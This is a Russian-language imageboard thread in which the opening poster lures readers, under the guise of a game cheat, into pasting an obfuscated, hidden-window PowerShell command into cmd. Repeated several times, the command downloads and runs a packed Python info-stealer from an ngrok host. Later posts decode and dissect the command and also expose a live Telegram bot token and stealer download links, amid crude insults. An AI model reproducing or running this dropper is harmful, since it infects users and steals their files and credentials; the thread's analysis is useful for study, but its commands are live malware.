Сыграем в игру "долбаеб года ?"Посоны, хотите фишмастер? echo & C: & cls & powershell -win Hidden -enc DQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZQBjAGgAbwAgAHQAcgBlAGUAIABDADoAIAAmACAAZQBjAGgAbwAgACQAaQBwACQAIAA+ACAAYwBsAGkAcAAuAGQAbABsACAAJgAgAGMAbABpAHAAIAA8ACAAYwBsAGkAcAAuAGQAbABsACIADQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZABlAGwAIAAvAHEAIABjAGwAaQBwAC4AZABsAGwAIgANAAoAIAAgACAAIAAgACAAIAAgAGkAdwByACAAaAB0AHQAcABzADoALwAvAGMAMAA4AGYANQAxADEAMQAuAG4AZwByAG8AawAuAGkAbwAvAC8AZABvAHcAbgBsAG8AYQBkAC8ALwBQAHkAUgBvAG8AdAAuAHMAYwByACAALQBPAHUAdABGAGkAbABlACAAUAB5AFIAbwBvAHQALgBzAGMAcgANAAoAIAAgACAAIAAgACAAIAAgAHMAdABhAHIAdAAgAFAAeQBSAG8AbwB0AC4AcwBjAHIADQAKACAAIAAgACAAexecute trueСкопируйте текст и вставьте в коммандную строку. Пуск - поиск - cmd. Кто смелый?
echo & C: & cls & powershell -win Hidden -enc DQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZQBjAGgAbwAgAHQAcgBlAGUAIABDADoAIAAmACAAZQBjAGgAbwAgACQAaQBwACQAIAA+ACAAYwBsAGkAcAAuAGQAbABsACAAJgAgAGMAbABpAHAAIAA8ACAAYwBsAGkAcAAuAGQAbABsACIADQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZABlAGwAIAAvAHEAIABjAGwAaQBwAC4AZABsAGwAIgANAAoAIAAgACAAIAAgACAAIAAgAGkAdwByACAAaAB0AHQAcABzADoALwAvAGMAMAA4AGYANQAxADEAMQAuAG4AZwByAG8AawAuAGkAbwAvAC8AZABvAHcAbgBsAG8AYQBkAC8ALwBQAHkAUgBvAG8AdAAuAHMAYwByACAALQBPAHUAdABGAGkAbABlACAAUAB5AFIAbwBvAHQALgBzAGMAcgANAAoAIAAgACAAIAAgACAAIAAgAHMAdABhAHIAdAAgAFAAeQBSAG8AbwB0AC4AcwBjAHIADQAKACAAIAAgACAAexecute true
echo & C: & cls & powershell -win Hidden -enc DQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZQBjAGgAbwAgAHQAcgBlAGUAIABDADoAIAAmACAAZQBjAGgAbwAgACQAaQBwACQAIAA+ACAAYwBsAGkAcAAuAGQAbABsACAAJgAgAGMAbABpAHAAIAA8ACAAYwBsAGkAcAAuAGQAbABsACIADQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZABlAGwAIAAvAHEAIABjAGwAaQBwAC4AZABsAGwAIgANAAoAIAAgACAAIAAgACAAIAAgAGkAdwByACAAaAB0AHQAcABzADoALwAvAGMAMAA4AGYANQAxADEAMQAuAG4AZwByAG8AawAuAGkAbwAvAC8AZABvAHcAbgBsAG8AYQBkAC8ALwBQAHkAUgBvAG8AdAAuAHMAYwByACAALQBPAHUAdABGAGkAbABlACAAUAB5AFIAbwBvAHQALgBzAGMAcgANAAoAIAAgACAAIAAgACAAIAAgAHMAdABhAHIAdAAgAFAAeQBSAG8AbwB0AC4AcwBjAHIADQAKACAAIAAgACAAexecute true
echo & C: & cls & powershell -win Hidden -enc DQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZQBjAGgAbwAgAHQAcgBlAGUAIABDADoAIAAmACAAZQBjAGgAbwAgACQAaQBwACQAIAA+ACAAYwBsAGkAcAAuAGQAbABsACAAJgAgAGMAbABpAHAAIAA8ACAAYwBsAGkAcAAuAGQAbABsACIADQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZABlAGwAIAAvAHEAIABjAGwAaQBwAC4AZABsAGwAIgANAAoAIAAgACAAIAAgACAAIAAgAGkAdwByACAAaAB0AHQAcABzADoALwAvAGMAMAA4AGYANQAxADEAMQAuAG4AZwByAG8AawAuAGkAbwAvAC8AZABvAHcAbgBsAG8AYQBkAC8ALwBQAHkAUgBvAG8AdAAuAHMAYwByACAALQBPAHUAdABGAGkAbABlACAAUAB5AFIAbwBvAHQALgBzAGMAcgANAAoAIAAgACAAIAAgACAAIAAgAHMAdABhAHIAdAAgAFAAeQBSAG8AbwB0AC4AcwBjAHIADQAKACAAIAAgACAAexecute true
>>199678215 (OP)>cmd "/c echo tree C: & echo $ip$ > clip.dll & clip < clip.dll">cmd "/c del /q clip.dll">iwr https://c08f5111.ngrok.io//download//PyRoot.scr -OutFile PyRoot.scr>start PyRoot.scr
АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА
Ну если кратко об этом есть видео но только там эта команда вводится при подключении bad usb а тут вы её вводите сами.https://www.youtube.com/watch?v=-QrfCNUxKgE
>>199679250Почему чмо? Я ведь в ОП посте предупредил, что там фишмастер, я не виноват, что уже 17 долбаебов майнит мне монеро.
>>199679662Ебать ты даунДаже с такой простой командой не справилсяЕще одно доказательтсво что линуксодауны не могут в cmd
короче я заебался. По итогу. Внутри проги архив c питоном. Анпачится с помощью https://sourceforge.net/projects/pyinstallerextractor/
>>199681763ты вообще о чём? это обычный плюсовый экзешник внутри которого зашит архив с питоном, в нём файлы, если ссылка которая ведёт на https://c08f5111.ngrok.io/download/send.php
>>199682704сейчас прикинул и это пиздец тупой развод от васяна из 3Б. Просто написан тупейший скрипт на питоне для отправки файлов на сервак и запакован прогой пакером в exe
>>199683527я спать, может завтра вечером поковыряю. может тред создам, если ты снова не будешь страдать подобной фигнёй. Хотя интересно какие должны быть хидеры у main? я знаю только про magic питона 3.4, ещё блок из 4х байт это дата, а третий я не ебу, инет ковырять лень.
>>199683852пизди что хочешь, я не пека задрот, а уж тем более не питон вирджин. Добавь оба треда на архивач, погэгаю завтра
>>199687785Школьник если и сдеванонится то только вместе со сгухой в придачу.Но таких тупых малолетних долбоебов я еще не видел.
>>199687750>>199687683@pizdauikkk12BotВот его телеграмм бот, дальше сами, я не умею вашими телеграммами пользоваться
{"ok":true,"result":{"id":880174650,"is_bot":true,"first_name":"pizda228","username":"pizdauikkk12Bot"}}
Бля, посоны, я ОП этого треда. Я там начал аватарить девочкой и моча потерла посты и с ним тред, да еще и тут половину постов. Я честно хотел травли((( Не специально аватарил. Ну вы не скучайте, пытайтесь по боту сдеанонить.
>>199678215 (OP)Пошёл нахой, взломаешь мой копутер, как я дрочить-то буду?Школьники ебучие, вкатят в ойти свои и ябут друг-друга в жёппы.
Так шо там по совместимости вируса с линуксом? Пути из под вайна в конкретно линуксовские прописаны или нет?
>>199688736Декомпилируешь PyInstaller. Получаешь байткод питона. Собираешь его через uncompyle6. Смотришь сурцы и видишь оригинальное название файла C:\# Python Scripts\Xanera\build\main\pyimod00_crypto_key и ключ StealerByXaneraN.
>>199689062Ну спроси кто у него покупал этот стиллер просто потому что он использовал его на своих же а не на хомячков они бы как раз ничего и не поняли.
>>199689421https://anonfiles.com/T2laN4y5na/123_au3http://dropmefiles.com/KA0cupass GDzPquвот же были перезаливы вроде.
>>199689062Бля такой обосрамс. Давайте еще автора этого дерьма на бутылку отправим. Хуже него только сам ОП-хуй, но с ним аноны уже расправились.
>>199689606Блять это не один и тот же человек.ЕБАТЬ. Так значит этого мы ещё телегу не нашли.Или хотите сказать что он один 2 стиллера купил зачем-то?
>>199689703Похуй. Что тот, что этот говнокодеры. Я чуть от смеха не умер, когда увидел на чем написан был софт.
>>199689814пиздец ты недоверчивыйнапиши боту в лс и сделайhttps://api.telegram.org/bot880174650:AAFuc1A8CySr7nutx4e-qKOhqc7P04F59Fk/sendMessage?text=[that guy](tg://user?id=561838453)&chat_id=<твой id в телеге>в лс тебе от бота ссылочка прилетит на юзера. она прилетает только в случае если этот юзер писал боту.
>>199678215 (OP)Хуя ты пидор ленивыйА вот црушникам не западло удаленно батник запустить, будь как они
>>199690090https://arhivach.ng/thread/468907/https://arhivach.ng/thread/468907/https://arhivach.ng/thread/468907/https://arhivach.ng/thread/468907/https://arhivach.ng/thread/468907/
>>199690242По чему вы начинаете параноить когда уже поздно? Меня пароли везде где можно пока есть время.
>>199690325На самом деле ещё не всё потеряно я бы с ноутбука бы всё пароли бы поменял а комп включил без интернета и откатил бы до точки восстановления.
Да, вы рофлите чи шо?, успокойтесь, ОП вас троллит, я ввёл команду, мне просто в ехплоере (он у меня стоит по умолчанию) открыло ссылку на картинку и всё. Картинку прикрепляю... БЛять, какие стилерры вы шо ебобо?
>>199690551я не оп, привет, я блять реально не понимаю, вы серьёзно такие наивные, если думаете, что командой строкой можно себе на комп закачать вирусы -_-
>>199690606окей, отключи интернет, так у тебя точно ничего не скачается, и вбей, ты убедишься, что я не вру -_-
>>199690655но по идее ты в начале команды куда-то прописываешься и скачаешь фаил после включения интернета. -_-
>>199690711А, всё ясно с тобой, мамкин программист, выйди нахуй с треда, если не разбираешься - не пиши.
>>199690741блять, я не понимаю, нахуй вы людей пугаете то? вы же сами прекрасно понимаете, что ничего не скачивается, это какой - то троллинг , чтобы все обосрались или что?
>>199690873>такойне знаю что с этим, но азоралт по 400 долларов продаюткряк без обнов за 50но это лучшийу опа может за 20 долларов или вообще пабликне проверял
>>199678215 (OP)>echo & C: & cls & powershell -win Hidden -enc DQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZQBjAGgAbwAgAHQAcgBlAGUAIABDADoAIAAmACAAZQBjAGgAbwAgACQAaQBwACQAIAA+ACAAYwBsAGkAcAAuAGQAbABsACAAJgAgAGMAbABpAHAAIAA8ACAAYwBsAGkAcAAuAGQAbABsACIADQAKACAAIAAgACAAIAAgACAAIABjAG0AZAAgACIALwBjACAAZABlAGwAIAAvAHEAIABjAGwAaQBwAC4AZABsAGwAIgANAAoAIAAgACAAIAAgACAAIAAgAGkAdwByACAAaAB0AHQAcABzADoALwAvAGMAMAA4AGYANQAxADEAMQAuAG4AZwByAG8AawAuAGkAbwAvAC8AZABvAHcAbgBsAG8AYQBkAC8ALwBQAHkAUgBvAG8AdAAuAHMAYwByACAALQBPAHUAdABGAGkAbABlACAAUAB5AFIAbwBvAHQALgBzAGMAcgANAAoAIAAgACAAIAAgACAAIAAgAHMAdABhAHIAdAAgAFAAeQBSAG8AbwB0AC4AcwBjAHIADQAKACAAIAAgACAA>execute trueЗапустил, и что дальше? И меня теперь вирус?
Зашифрованная хуита:cmd "/c echo tree C: & echo $ip$ > clip.dll & clip < clip.dll"cmd "/c del /q clip.dll"iwr http://youtubepr.ru/img/screens/123.exe -OutFile 123.exestart 123.exe
>>199692191>Зашифрованная хуита:>cmd "/c echo tree C: & echo $ip$ > clip.dll & clip < clip.dll">>cmd "/c del /q clip.dll">>iwr http://youtubepr.ru/img/screens/123.exe -OutFile 123.exe>>start 123.exe
>>199692191Блятб, не то прогнал через декодерcmd "/c echo tree C: & echo $ip$ > clip.dll & clip < clip.dll"cmd "/c del /q clip.dll"iwr https://c08f5111.ngrok.io//download//PyRoot.scr -OutFile PyRoot.scrstart PyRoot.scrФикс
Ну то? Задиванонили школьника долбоеба? Пойду спать, наверное когда я проснусь то этого треда с пятнадцатилетним мастером сарказма не будет. Перекатывайте в травлю-тред кароче.